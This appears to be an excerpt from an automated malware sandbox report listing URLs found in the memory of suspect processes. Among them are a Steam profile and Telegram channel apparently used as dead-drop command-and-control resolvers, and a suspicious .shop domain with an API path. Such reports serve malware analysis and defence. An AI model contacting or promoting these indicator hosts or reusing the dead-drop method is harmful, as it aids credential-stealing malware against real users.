Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
Source: 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://help.steampowered.com/en/
Source: GIIDBG.9.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000002.00000000.2041938278.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/discussions/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/ho
Source: 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/m
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/market/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 5358.exe, 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, 5358.exe, 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, 5358.exe, 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000795000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
Source: kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899r0isMozilla/5.0
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/about/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/explore/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/legal/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/mobile
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/news/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/points/shop/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/stats/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: GDHIII.9.dr String found in binary or memory: https://support.mozilla.org
Source: GDHIII.9.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: A247.exe, 00000005.00000003.2427616680.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: GDHIII.9.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: 5358.exe, 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, 5358.exe, 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, 5358.exe, 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/copterwin
Source: kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/copterwinr0isMozilla/5.0
Source: A247.exe, 00000005.00000002.2872028176.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000002.2872028176.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/%%
Source: A247.exe, 00000005.00000003.2384817568.0000000000909000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/(
Source: A247.exe, 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/_o5e
Source: A247.exe, 00000005.00000003.2384817568.0000000000909000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/api
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000002.2872028176.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/r
Source: explorer.exe, 00000002.00000000.2038509404.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2038509404.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: GDHIII.9.dr String found in binary or memory: https://www.mozilla.org
Source: GDHIII.9.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: GDHIII.9.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: A247.exe, 00000005.00000003.2427616680.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.3023097464.000000001BFB9000.00000004.00000020.00020000.00000000.sdmp, GDHIII.9.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: GDHIII.9.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: A247.exe, 00000005.00000003.2427616680.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.3023097464.000000001BFB9000.00000004.00000020.00020000.00000000.sdmp, GDHIII.9.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: A247.exe, 00000005.00000003.2427616680.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.3023097464.000000001BFB9000.00000004.00000020.00020000.00000000.sdmp, GDHIII.9.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
